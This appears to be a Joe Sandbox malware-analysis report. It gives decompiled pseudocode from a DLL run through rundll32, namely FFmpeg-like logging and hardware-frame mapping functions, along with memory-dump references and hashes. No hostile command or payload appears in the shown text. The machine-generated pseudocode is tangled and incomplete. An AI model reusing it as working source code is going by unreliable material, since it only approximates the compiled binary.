                                                                      				void* _t108;
                                                                      				char* _t112;
                                                                      				intOrPtr _t127;
                                                                      				char* _t128;
                                                                      				void* _t131;
                                                                      				char* _t132;
                                                                      				signed int _t136;
                                                                      				signed int _t138;
                                                                      				void* _t139;
                                                                      				signed int _t141;
                                                                      				signed int _t143;
                                                                      				signed int _t145;
                                                                      				signed int _t147;
                                                                      				signed int _t149;
                                                                      				signed int _t152;
                                                                      				signed int _t155;
                                                                      				signed int _t158;
                                                                      				signed int _t161;
                                                                      				signed int _t162;
                                                                      				signed int _t164;
                                                                      				signed int _t166;
                                                                      				void* _t167;
                                                                      				signed int* _t168;
                                                                      
                                                                      				_t168 = _t167 - L100918A0(0x103c);
                                                                      				_t136 = _t168[0x414];
                                                                      				if(_t136 == 0) {
                                                                      					_t168[2] = 1;
                                                                      					 *_t168 =  &(_t168[0xc]);
                                                                      					_t168[1] = 0;
                                                                      					L10008880(0, 0, 1, 1);
                                                                      					_t168[2] = 1;
                                                                      					_t161 =  &(_t168[0x20c]);
                                                                      					_t168[1] = 0;
                                                                      					_t158 =  &(_t168[0x30c]);
                                                                      					 *_t168 =  &(_t168[0x10c]);
                                                                      					L10008880(0, _t158, _t161, 1);
                                                                      					_t168[1] = 0;
                                                                      					_t168[2] = 1;
                                                                      					 *_t168 = _t161;
                                                                      					L10008880(0, _t158, _t161, 1);
                                                                      					_t168[2] = 0x10000;
                                                                      					_t168[1] = 0;
                                                                      					 *_t168 = _t158;
                                                                      					L10008880(0, _t158, _t161, 1);
                                                                      					_t100 =  *(_t168[0x41a]) & 0xffffff00 |  *(_t168[0x41a]) != 0x00000000;
                                                                      					L8:
                                                                      					if(_t168[0x415] >= 0xfffffff9 && _t100 != 0 && ( *0x100d76ac & 0x00000002) != 0) {
                                                                      						_t67 = _t168[0x415] + 8; // 0x101
                                                                      						_t152 = _t67;
                                                                      						_t112 = 0x100b6d3b;
                                                                      						if(_t152 <= 0x40) {
                                                                      							_t112 =  *(0x100b6f40 + _t152 * 4);
                                                                      						}
                                                                      						_t168[2] = _t112;
                                                                      						_t168[1] = "[%s] ";
                                                                      						 *_t168 = _t161;
                                                                      						L100089C0();
                                                                      					}
                                                                      					 *_t168 = _t158;
                                                                      					_t168[2] = _t168[0x417];
                                                                      					_t168[1] = _t168[0x416];
                                                                      					L10008B70();
                                                                      					_t104 = _t168[0xc];
                                                                      					_t141 = _t168[0x10c];
                                                                      					_t162 = _t168[0x20c];
                                                                      					_t138 = _t168[0x30c];
                                                                      					if( *_t104 != 0 ||  *_t141 != 0 ||  *_t162 != 0) {
                                                                      						L12:
                                                                      						_t164 = _t168[0x30d];
                                                                      						_t147 = 0;
                                                                      						if(_t164 != 0 && _t168[0x30e] >= _t164) {
                                                                      							_t149 =  *(_t138 + _t164 - 1) & 0x000000ff;
                                                                      							_t168[0xa] = _t149 == 0xa;
                                                                      							_t147 = (_t149 & 0xffffff00 | _t149 == 0x0000000d | _t168[0xa]) & 0x000000ff;
                                                                      						}
                                                                      						 *(_t168[0x41a]) = _t147;
                                                                      						goto L16;
                                                                      					} else {
                                                                      						if( *_t138 == 0) {
                                                                      							L16:
                                                                      							_t168[3] = _t104;
                                                                      							_t168[2] = "%s%s%s%s";
                                                                      							_t168[6] = _t138;
                                                                      							_t168[5] = _t162;
                                                                      							_t168[4] = _t141;
                                                                      							_t168[1] = _t168[0x419];
                                                                      							 *_t168 = _t168[0x418];
                                                                      							_t108 = L10025AE0();
                                                                      							 *_t168 = _t158;
                                                                      							_t168[1] = 0;
                                                                      							_t139 = _t108;
                                                                      							E10009690(_t139, _t141, _t158, _t162);
                                                                      							return _t139;
                                                                      						}
                                                                      						goto L12;
                                                                      					}
                                                                      				}
                                                                      				_t168[2] = 1;
                                                                      				_t166 =  &(_t168[0x10c]);
                                                                      				_t168[1] = 0;
                                                                      				 *_t168 =  &(_t168[0xc]);
                                                                      				_t161 =  &(_t168[0x20c]);
                                                                      				_t168[0xa] =  *_t136;
                                                                      				L10008880(_t136, 0x10000, _t161, _t166);
                                                                      				_t168[2] = 1;
                                                                      				_t168[1] = 0;
                                                                      				 *_t168 = _t166;
                                                                      				L10008880(_t136, 0x10000, _t161, _t166);
                                                                      				_t168[2] = 1;
                                                                      				_t168[1] = 0;
                                                                      				 *_t168 = _t161;
                                                                      				L10008880(_t136, 0x10000, _t161, _t166);
                                                                      				_t168[2] = 0x10000;
                                                                      				_t158 =  &(_t168[0x30c]);
                                                                      				_t168[1] = 0;
                                                                      				 *_t168 = _t158;
                                                                      				L10008880(_t136, _t158, _t161, _t166);
                                                                      				_t155 = _t168[0xa];
                                                                      				_t143 = 0 |  *(_t168[0x41a]) != 0x00000000;
                                                                      				_t100 = _t143;
                                                                      				if(_t155 != 0 && _t143 != 0) {
                                                                      					_t127 =  *((intOrPtr*)(_t155 + 0x14));
                                                                      					if(_t127 != 0) {
                                                                      						_t145 =  *(_t136 + _t127);
                                                                      						if(_t145 != 0) {
                                                                      							_t131 =  *_t145;
                                                                      							if(_t131 != 0) {
                                                                      								 *_t168 = _t145;
                                                                      								_t168[0xb] = _t155;
                                                                      								_t168[0xa] = _t145;
                                                                      								_t132 =  *((intOrPtr*)(_t131 + 4))();
                                                                      								_t168[3] = _t168[0xa];
                                                                      								_t168[2] = _t132;
                                                                      								_t168[1] = "[%s @ %p] ";
                                                                      								 *_t168 =  &(_t168[0xc]);
                                                                      								L100089C0();
                                                                      								_t155 = _t168[0xb];
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      					 *_t168 = _t136;
                                                                      					_t128 =  *((intOrPtr*)(_t155 + 4))();
                                                                      					_t168[3] = _t136;
                                                                      					_t168[1] = "[%s @ %p] ";
                                                                      					 *_t168 = _t166;
                                                                      					_t168[2] = _t128;
                                                                      					L100089C0();
                                                                      					_t100 = _t168[0x41a] & 0xffffff00 |  *(_t168[0x41a]) != 0x00000000;
                                                                      				}
                                                                      			}
                                                                      0x1002645a
                                                                      0x1002645a
                                                                      0x00000000
                                                                      0x10026470
                                                                      0x100263c6
                                                                      0x1002627b
                                                                      0x1002627f
                                                                      0x10026288
                                                                      0x10026290
                                                                      0x10026293
                                                                      0x1002629a
                                                                      0x1002629e
                                                                      0x100262a8
                                                                      0x100262ae
                                                                      0x100262b2
                                                                      0x100262b5
                                                                      0x100262c1
                                                                      0x100262c5
                                                                      0x100262c9
                                                                      0x100262cc
                                                                      0x100262d3
                                                                      0x100262d7
                                                                      0x100262de
                                                                      0x100262e2
                                                                      0x100262e5
                                                                      0x100262f1
                                                                      0x100262f9
                                                                      0x100262fe
                                                                      0x10026300
                                                                      0x10026306
                                                                      0x1002630b
                                                                      0x1002630d
                                                                      0x10026312
                                                                      0x10026314
                                                                      0x10026318
                                                                      0x1002631a
                                                                      0x1002631d
                                                                      0x10026321
                                                                      0x10026325
                                                                      0x1002632c
                                                                      0x10026330
                                                                      0x10026339
                                                                      0x10026341
                                                                      0x10026344
                                                                      0x10026349
                                                                      0x10026349
                                                                      0x10026318
                                                                      0x10026312
                                                                      0x1002634d
                                                                      0x10026350
                                                                      0x10026358
                                                                      0x1002635c
                                                                      0x10026360
                                                                      0x10026363
                                                                      0x10026367
                                                                      0x10026377
                                                                      0x10026377

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_bprint_init$mv_bprintf$mv_bprint_finalizemv_vbprintf
                                                                      • String ID: %s%s%s%s$[%s @ %p] $[%s]
                                                                      • API String ID: 2514531573-1798253436
                                                                      • Opcode ID: 3f2bd632272b9df47179aee3b67c56da7bd7b79c66d3fadd9b491fc2fadde794
                                                                      • Instruction ID: c71d304a02298176911f7b5d9492a31840536d8b4fe4b07b2d7bce997b72d9a0
                                                                      • Opcode Fuzzy Hash: 3f2bd632272b9df47179aee3b67c56da7bd7b79c66d3fadd9b491fc2fadde794
                                                                      • Instruction Fuzzy Hash: 808119B49097809FD350DF28D48069FBBE1FF88340F85892EE8C887355DB75AA84CB42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_log$mv_get_pix_fmt_name
                                                                      • String ID: Error creating an internal frame pool$Failed to open device handle$NV12$P010$Unknown surface type: %lu$Unsupported pixel format: %s
                                                                      • API String ID: 2830795485-4196069199
                                                                      • Opcode ID: 7e434e73dff374732bf92a6c6b461502dd5c9fdd604f663b4050518d1b8bf5f6
                                                                      • Instruction ID: dbfc9fc73534cf50ff89b72e71a8ef33aba9b4af1470f45bc046c89c466e1acb
                                                                      • Opcode Fuzzy Hash: 7e434e73dff374732bf92a6c6b461502dd5c9fdd604f663b4050518d1b8bf5f6
                                                                      • Instruction Fuzzy Hash: 3371C2B46087459FC750DF29D58460ABBE1FF88300F91C96EF9998B356E774E840DB42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 28%
                                                                      			E1001E450(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi) {
                                                                      				signed int _t213;
                                                                      				signed int _t214;
                                                                      				intOrPtr _t215;
                                                                      				signed int _t219;
                                                                      				signed int _t220;
                                                                      				signed int _t221;
                                                                      				signed int _t224;
                                                                      				signed int _t227;
                                                                      				signed int _t228;
                                                                      				signed int _t230;
                                                                      				signed int _t247;
                                                                      				signed int _t253;
                                                                      				signed int _t254;
                                                                      				signed int _t255;
                                                                      				signed int _t257;
                                                                      				void* _t258;
                                                                      				void* _t259;
                                                                      				signed int _t261;
                                                                      				void* _t262;
                                                                      				void* _t263;
                                                                      				signed char _t267;
                                                                      				signed int _t268;
                                                                      				signed int _t269;
                                                                      				signed int _t273;
                                                                      				intOrPtr _t275;
                                                                      				intOrPtr _t280;
                                                                      				signed int _t281;
                                                                      				signed int _t282;
                                                                      				signed int _t283;
                                                                      				intOrPtr _t289;
                                                                      				signed int _t291;
                                                                      				signed int _t297;
                                                                      				signed int _t300;
                                                                      				signed int _t302;
                                                                      				signed int _t304;
                                                                      				signed short* _t309;
                                                                      				signed short* _t310;
                                                                      				int _t314;
                                                                      				signed int _t324;
                                                                      				intOrPtr* _t326;
                                                                      				intOrPtr _t327;
                                                                      				signed char _t335;
                                                                      				short* _t336;
                                                                      				signed char _t337;
                                                                      				short* _t338;
                                                                      				signed int _t339;
                                                                      				signed int _t341;
                                                                      				char* _t343;
                                                                      				signed int _t345;
                                                                      				signed int _t347;
                                                                      				signed int _t349;
                                                                      				signed int _t352;
                                                                      				void* _t353;
                                                                      				void* _t356;
                                                                      				signed int _t362;
                                                                      				signed int _t364;
                                                                      				signed int _t368;
                                                                      				signed int _t370;
                                                                      				signed int _t373;
                                                                      				signed short* _t374;
                                                                      				signed short* _t375;
                                                                      				signed int _t376;
                                                                      				void* _t378;
                                                                      				signed int _t381;
                                                                      				intOrPtr _t382;
                                                                      				signed int _t383;
                                                                      				signed int _t385;
                                                                      				signed int _t388;
                                                                      				void* _t389;
                                                                      				intOrPtr* _t390;
                                                                      				signed int* _t392;
                                                                      				signed int* _t396;
                                                                      
                                                                      				_t390 = _t389 - 0x4c;
                                                                      				 *((intOrPtr*)(_t390 + 0x44)) = __edi;
                                                                      				 *((intOrPtr*)(_t390 + 0x3c)) = __ebx;
                                                                      				_t343 =  *(_t390 + 0x54);
                                                                      				 *((intOrPtr*)(_t390 + 0x48)) = _t382;
                                                                      				_t289 =  *((intOrPtr*)(_t390 + 0x50));
                                                                      				 *((intOrPtr*)(_t390 + 0x40)) = __esi;
                                                                      				 *(_t390 + 0x28) =  *(_t390 + 0x58);
                                                                      				_t383 =  *(_t289 + 0x50);
                                                                      				_t362 =  *(_t289 + 0x128);
                                                                      				 *(_t390 + 0x24) = _t383;
                                                                      				if(_t343[0x128] == 0) {
                                                                      					_t213 = _t362;
                                                                      					goto L83;
                                                                      				} else {
                                                                      					__eflags = __esi;
                                                                      					__edx =  *(__eax + 4);
                                                                      					if(__esi == 0) {
                                                                      						__eax = __edi[0x50];
                                                                      						__eflags =  *((intOrPtr*)(__edx + 0x24)) - __edi[0x50];
                                                                      						if( *((intOrPtr*)(__edx + 0x24)) != __edi[0x50]) {
                                                                      							goto L91;
                                                                      						} else {
                                                                      							 *(__edx + 4) =  *( *(__edx + 4));
                                                                      							__eax =  *( *( *(__edx + 4)) + 0x50);
                                                                      							__eflags = __eax;
                                                                      							if(__eax == 0) {
                                                                      								goto L91;
                                                                      							} else {
                                                                      								goto L79;
                                                                      							}
                                                                      						}
                                                                      					} else {
                                                                      						__eax =  *(__esi + 4);
                                                                      						__eflags = __eax - __edx;
                                                                      						if(__eax == __edx) {
                                                                      							__ecx =  *(__eax + 0x28);
                                                                      							__eflags = __edi[0x50] -  *(__eax + 0x28);
                                                                      							if(__edi[0x50] !=  *(__eax + 0x28)) {
                                                                      								goto L66;
                                                                      							} else {
                                                                      								__eflags =  *((intOrPtr*)(__eax + 0x24)) - __ebp;
                                                                      								if( *((intOrPtr*)(__eax + 0x24)) != __ebp) {
                                                                      									goto L66;
                                                                      								} else {
                                                                      									goto L89;
                                                                      								}
                                                                      							}
                                                                      						} else {
                                                                      							L66:
                                                                      							__ecx =  *(__edx + 4);
                                                                      							__esp[0xb] = __ecx;
                                                                      							__ecx = __ecx[0xc];
                                                                      							__eflags = __ecx;
                                                                      							if(__ecx == 0) {
                                                                      								L68:
                                                                      								__ecx = __edi[0x50];
                                                                      								__eflags =  *((intOrPtr*)(__edx + 0x24)) - __edi[0x50];
                                                                      								if( *((intOrPtr*)(__edx + 0x24)) == __edi[0x50]) {
                                                                      									__esp[0xb] =  *(__esp[0xb]);
                                                                      									__eax =  *( *(__esp[0xb]) + 0x50);
                                                                      									__eflags = __eax;
                                                                      									if(__eax != 0) {
                                                                      										L79:
                                                                      										__esp[2] = __edi;
                                                                      										__ecx = __esp[0xa];
                                                                      										__esp[1] = __ebx;
                                                                      										 *__esp = __edx;
                                                                      										__esp[3] = __esp[0xa];
                                                                      										__eax =  *__eax();
                                                                      										__eflags = __eax;
                                                                      										if(__eax >= 0) {
                                                                      											goto L76;
                                                                      										} else {
                                                                      											__eflags = __eax - 0xffffffd8;
                                                                      											if(__eax != 0xffffffd8) {
                                                                      												goto L73;
                                                                      											} else {
                                                                      												__eax =  *(__ebx + 0x128);
                                                                      												L83:
                                                                      												__eflags = _t213;
                                                                      												if(_t213 == 0) {
                                                                      													goto L91;
                                                                      												} else {
                                                                      													 *(_t390 + 0x24) =  *(_t289 + 0x50);
                                                                      													goto L85;
                                                                      												}
                                                                      											}
                                                                      										}
                                                                      									} else {
                                                                      										__eax = __esi;
                                                                      										L85:
                                                                      										_t215 =  *((intOrPtr*)(_t213 + 4));
                                                                      										goto L69;
                                                                      									}
                                                                      								} else {
                                                                      									L69:
                                                                      									__eflags =  *((intOrPtr*)(_t215 + 0x24)) -  *(_t390 + 0x24);
                                                                      									if( *((intOrPtr*)(_t215 + 0x24)) !=  *(_t390 + 0x24)) {
                                                                      										L91:
                                                                      										_t214 = 0xffffffd8;
                                                                      										goto L76;
                                                                      									} else {
                                                                      										_t324 =  *( *((intOrPtr*)( *((intOrPtr*)(_t215 + 4)))) + 0x4c);
                                                                      										__eflags = _t324;
                                                                      										if(_t324 == 0) {
                                                                      											goto L91;
                                                                      										} else {
                                                                      											 *(_t390 + 8) = _t343;
                                                                      											 *((intOrPtr*)(_t390 + 4)) = _t289;
                                                                      											 *_t390 = _t215;
                                                                      											 *(_t390 + 0xc) =  *(_t390 + 0x28);
                                                                      											_t214 =  *_t324();
                                                                      											__eflags = _t214;
                                                                      											if(_t214 >= 0) {
                                                                      												goto L76;
                                                                      											} else {
                                                                      												__eflags = _t214 - 0xffffffd8;
                                                                      												if(_t214 == 0xffffffd8) {
                                                                      													goto L91;
                                                                      												} else {
                                                                      													L73:
                                                                      													__eflags = _t362;
                                                                      													if(_t362 == 0) {
                                                                      														L75:
                                                                      														 *(_t390 + 0x24) = _t214;
                                                                      														__eflags = 0;
                                                                      														 *(_t289 + 0x128) = 0;
                                                                      														 *_t390 = _t289;
                                                                      														E1001B300();
                                                                      														_t214 =  *(_t390 + 0x24);
                                                                      														 *(_t289 + 0x128) = _t362;
                                                                      														 *(_t289 + 0x50) = _t383;
                                                                      														goto L76;
                                                                      													} else {
                                                                      														__eflags =  *(_t289 + 0x128) - _t362;
                                                                      														if( *(_t289 + 0x128) != _t362) {
                                                                      															 *((intOrPtr*)(_t390 + 0x14)) = 0x358;
                                                                      															__eflags = 0;
                                                                      															 *((intOrPtr*)(_t390 + 4)) = 0;
                                                                      															 *_t390 = 0;
                                                                      															 *(_t390 + 0x10) = "libavutil/hwcontext.c";
                                                                      															 *(_t390 + 0xc) = "orig_dst_frames == ((void *)0) || orig_dst_frames == dst->hw_frames_ctx";
                                                                      															 *(_t390 + 8) = "Assertion %s failed at %s:%d\n";
                                                                      															E10026560();
                                                                      															abort();
                                                                      															_push(_t362);
                                                                      															_push(_t289);
                                                                      															_t392 = _t390 - 0x34;
                                                                      															_t219 = _t392[0x10];
                                                                      															_t291 = _t392[0x11];
                                                                      															_t364 =  *(_t219 + 4);
                                                                      															_t326 =  *((intOrPtr*)(_t364 + 4));
                                                                      															_t306 =  *(_t326 + 0xc);
                                                                      															__eflags =  *(_t326 + 0xc);
                                                                      															if( *(_t326 + 0xc) == 0) {
                                                                      																_t327 =  *_t326;
                                                                      																_t307 =  *(_t327 + 0x3c);
                                                                      																__eflags =  *(_t327 + 0x3c);
                                                                      																if( *(_t327 + 0x3c) == 0) {
                                                                      																	_t220 = 0xffffffd8;
                                                                      																	goto L103;
                                                                      																} else {
                                                                      																	__eflags =  *(_t364 + 0x1c);
                                                                      																	if( *(_t364 + 0x1c) == 0) {
                                                                      																		_t220 = 0xffffffea;
                                                                      																		goto L103;
                                                                      																	} else {
                                                                      																		 *_t392 = _t219;
                                                                      																		_t221 = L10009FC0(_t291, _t307);
                                                                      																		 *(_t291 + 0x128) = _t221;
                                                                      																		__eflags = _t221;
                                                                      																		if(_t221 == 0) {
                                                                      																			goto L102;
                                                                      																		} else {
                                                                      																			_t392[1] = _t291;
                                                                      																			 *_t392 = _t364;
                                                                      																			_t224 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t364 + 4)))) + 0x3c))();
                                                                      																			__eflags = _t224;
                                                                      																			if(_t224 < 0) {
                                                                      																				_t392[7] = _t224;
                                                                      																				 *_t392 = _t291 + 0x128;
                                                                      																				E1000A000(_t291 + 0x128, _t364);
                                                                      																				_t220 = _t392[7];
                                                                      																				goto L103;
                                                                      																			} else {
                                                                      																				 *(_t291 + 0x40) = _t291;
                                                                      																				__eflags = 0;
                                                                      																				return 0;
                                                                      																			}
                                                                      																		}
                                                                      																	}
                                                                      																}
                                                                      															} else {
                                                                      																 *((intOrPtr*)(_t291 + 0x50)) =  *((intOrPtr*)(_t364 + 0x24));
                                                                      																 *_t392 = _t219;
                                                                      																_t227 = L10009FC0(_t291, _t306);
                                                                      																 *(_t291 + 0x128) = _t227;
                                                                      																__eflags = _t227;
                                                                      																if(_t227 == 0) {
                                                                      																	L102:
                                                                      																	_t220 = 0xfffffff4;
                                                                      																	goto L103;
                                                                      																} else {
                                                                      																	_t228 = L1001AC40(_t291, _t343, _t364);
                                                                      																	_t392[0xb] = _t228;
                                                                      																	__eflags = _t228;
                                                                      																	if(_t228 == 0) {
                                                                      																		goto L102;
                                                                      																	} else {
                                                                      																		_t392[1] = _t228;
                                                                      																		_t392[2] = 0;
                                                                      																		_t230 =  *( *((intOrPtr*)(_t364 + 4)) + 0xc);
                                                                      																		 *_t392 = _t230;
                                                                      																		L96();
                                                                      																		__eflags = _t230;
                                                                      																		if(_t230 < 0) {
                                                                      																			L109:
                                                                      																			_t392[7] = _t230;
                                                                      																			 *_t392 =  &(_t392[0xb]);
                                                                      																			L1001ADB0(_t291);
                                                                      																			return _t392[7];
                                                                      																		} else {
                                                                      																			 *_t392 = _t291;
                                                                      																			_t392[2] =  *( *((intOrPtr*)(_t364 + 4)) + 0x10);
                                                                      																			_t392[1] = _t392[0xb];
                                                                      																			_t230 = E1001E450(_t291, _t343, _t364);
                                                                      																			__eflags = _t230;
                                                                      																			if(_t230 == 0) {
                                                                      																				goto L109;
                                                                      																			} else {
                                                                      																				_t392[3] = _t230;
                                                                      																				_t392[7] = _t230;
                                                                      																				_t392[1] = 0x10;
                                                                      																				_t392[2] = "Failed to map frame into derived frame context: %d.\n";
                                                                      																				 *_t392 = _t364;
                                                                      																				E10026560();
                                                                      																				 *_t392 =  &(_t392[0xb]);
                                                                      																				L1001ADB0("Failed to map frame into derived frame context: %d.\n");
                                                                      																				_t220 = _t392[7];
                                                                      																				L103:
                                                                      																				return _t220;
                                                                      																			}
                                                                      																		}
                                                                      																	}
                                                                      																}
                                                                      															}
                                                                      														} else {
                                                                      															goto L75;
                                                                      														}
                                                                      													}
                                                                      												}
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							} else {
                                                                      								__eflags = __ecx[4] - __eax;
                                                                      								if(__ecx[4] == __eax) {
                                                                      									L89:
                                                                      									__eax = __edi[0xb8];
                                                                      									__eflags = __eax;
                                                                      									if(__eax == 0) {
                                                                      										 *__esp = __edx;
                                                                      										__ecx = "Invalid mapping found when attempting unmap.\n";
                                                                      										__ebx = 0x10;
                                                                      										__esp[2] = "Invalid mapping found when attempting unmap.\n";
                                                                      										__esp[1] = 0x10;
                                                                      										E10026560() = 0xffffffea;
                                                                      										L76:
                                                                      										return _t214;
                                                                      									} else {
                                                                      										__esi =  *(__eax + 4);
                                                                      										__eax = E1001B300(__ebx);
                                                                      										__edi = __esp[0x11];
                                                                      										__ebp = __esp[0x12];
                                                                      										__eax =  *__esi;
                                                                      										__esp[0x14] = __ebx;
                                                                      										__esi = __esp[0x10];
                                                                      										__ebx = __esp[0xf];
                                                                      										__esp[0x15] = __eax;
                                                                      										__esp =  &(__esp[0x13]);
                                                                      										_push(_t383);
                                                                      										_push(_t343);
                                                                      										_push(_t362);
                                                                      										_t396 = _t390 - 0x1c;
                                                                      										_t297 = _t396[0xd];
                                                                      										_t385 = _t396[0xc];
                                                                      										_t345 = _t297 + 0x148;
                                                                      										 *((intOrPtr*)(_t385 + 0x50)) =  *((intOrPtr*)(_t297 + 0x50));
                                                                      										 *((intOrPtr*)(_t385 + 0x44)) =  *((intOrPtr*)(_t297 + 0x44));
                                                                      										 *((intOrPtr*)(_t385 + 0x48)) =  *((intOrPtr*)(_t297 + 0x48));
                                                                      										 *((intOrPtr*)(_t385 + 0x4c)) =  *((intOrPtr*)(_t297 + 0x4c));
                                                                      										 *(_t385 + 0x120) =  *(_t297 + 0x120);
                                                                      										 *(_t385 + 0xb4) =  *(_t297 + 0xb4);
                                                                      										 *(_t385 + 0xb0) =  *(_t297 + 0xb0);
                                                                      										 *_t396 = _t345;
                                                                      										if(L1000EC10(_t289) == 0) {
                                                                      											_t283 =  *(_t297 + 0xb4);
                                                                      											_t341 =  *(_t297 + 0xb0);
                                                                      											if((_t283 | _t341) != 0) {
                                                                      												_t396[2] = _t283;
                                                                      												_t396[1] = _t341;
                                                                      												 *_t396 = _t385 + 0x148;
                                                                      												E1000D1B0();
                                                                      											} else {
                                                                      												 *(_t385 + 0x14c) =  *(_t297 + 0x120);
                                                                      												 *(_t385 + 0x148) = 0;
                                                                      											}
                                                                      										}
                                                                      										_t308 = 0;
                                                                      										_t247 = E1001A6C0(_t385, 0, _t297, 0);
                                                                      										_t368 = _t247;
                                                                      										if(_t247 < 0) {
                                                                      											L20:
                                                                      											E1001A460(_t385);
                                                                      											return _t368;
                                                                      										} else {
                                                                      											 *_t396 = _t345;
                                                                      											if(L1000EC10() != 0) {
                                                                      												_t396[1] = _t345;
                                                                      												 *_t396 = _t385 + 0x148;
                                                                      												_t253 = E1000D340();
                                                                      												__eflags = _t253;
                                                                      												_t368 = _t253;
                                                                      												if(_t253 < 0) {
                                                                      													goto L20;
                                                                      												} else {
                                                                      													_t254 =  *(_t297 + 0xb8);
                                                                      													__eflags = _t254;
                                                                      													if(_t254 != 0) {
                                                                      														goto L7;
                                                                      													} else {
                                                                      														goto L33;
                                                                      													}
                                                                      												}
                                                                      											} else {
                                                                      												_t254 =  *(_t297 + 0xb8);
                                                                      												if(_t254 == 0) {
                                                                      													L33:
                                                                      													 *_t396 = _t385;
                                                                      													_t396[1] = 0;
                                                                      													_t281 = L1001ADF0();
                                                                      													__eflags = _t281;
                                                                      													_t368 = _t281;
                                                                      													if(_t281 < 0) {
                                                                      														goto L20;
                                                                      													} else {
                                                                      														_t396[1] = _t297;
                                                                      														 *_t396 = _t385;
                                                                      														_t282 = L1001B8D0();
                                                                      														__eflags = _t282;
                                                                      														_t368 = _t282;
                                                                      														if(_t282 < 0) {
                                                                      															goto L20;
                                                                      														} else {
                                                                      															goto L35;
                                                                      														}
                                                                      													}
                                                                      												} else {
                                                                      													L7:
                                                                      													_t370 = 0;
                                                                      													L9:
                                                                      													while(1) {
                                                                      														if(_t254 == 0) {
                                                                      															L11:
                                                                      															_t370 = _t370 + 1;
                                                                      															if(_t370 != 8) {
                                                                      																_t254 =  *(_t297 + 0xb8 + _t370 * 4);
                                                                      																continue;
                                                                      															} else {
                                                                      																if( *((intOrPtr*)(_t297 + 0xd8)) == 0) {
                                                                      																	L22:
                                                                      																	_t255 =  *(_t297 + 0x128);
                                                                      																	__eflags = _t255;
                                                                      																	if(_t255 == 0) {
                                                                      																		L24:
                                                                      																		__eflags =  *(_t297 + 0x40) - _t297;
                                                                      																		if( *(_t297 + 0x40) == _t297) {
                                                                      																			 *(_t385 + 0x40) = _t385;
                                                                      																			goto L38;
                                                                      																		} else {
                                                                      																			_t352 =  *(_t385 + 0x14c);
                                                                      																			_t368 = 0xffffffea;
                                                                      																			__eflags = _t352;
                                                                      																			if(_t352 == 0) {
                                                                      																				goto L20;
                                                                      																			} else {
                                                                      																				_t396[1] = _t352;
                                                                      																				 *_t396 = 4;
                                                                      																				_t267 = L10028EC0();
                                                                      																				 *(_t385 + 0x40) = _t267;
                                                                      																				__eflags = _t267;
                                                                      																				if(_t267 == 0) {
                                                                      																					goto L19;
                                                                      																				} else {
                                                                      																					_t314 = _t352 * 4;
                                                                      																					_t378 =  *(_t297 + 0x40);
                                                                      																					_t353 = _t267;
                                                                      																					__eflags = _t314 - 8;
                                                                      																					if(_t314 >= 8) {
                                                                      																						__eflags = _t267 & 0x00000001;
                                                                      																						if((_t267 & 0x00000001) != 0) {
                                                                      																							_t268 =  *_t378 & 0x000000ff;
                                                                      																							_t353 = _t353 + 1;
                                                                      																							_t378 = _t378 + 1;
                                                                      																							_t314 = _t314 - 1;
                                                                      																							 *(_t353 - 1) = _t268;
                                                                      																						}
                                                                      																						__eflags = _t353 & 0x00000002;
                                                                      																						if((_t353 & 0x00000002) != 0) {
                                                                      																							_t269 =  *_t378 & 0x0000ffff;
                                                                      																							_t353 = _t353 + 2;
                                                                      																							_t378 = _t378 + 2;
                                                                      																							_t314 = _t314 - 2;
                                                                      																							 *(_t353 - 2) = _t269;
                                                                      																						}
                                                                      																						__eflags = _t353 & 0x00000004;
                                                                      																						if((_t353 & 0x00000004) == 0) {
                                                                      																							goto L28;
                                                                      																						} else {
                                                                      																							_t356 = _t353 + 4;
                                                                      																							 *(_t356 - 4) =  *_t378;
                                                                      																							memcpy(_t356, _t378 + 4, _t314 - 4);
                                                                      																							_t396 =  &(_t396[3]);
                                                                      																							goto L38;
                                                                      																						}
                                                                      																						L50:
                                                                      																						_t338 = _t337 + _t262;
                                                                      																						_t375 = _t374 + _t262;
                                                                      																						_t263 = 0;
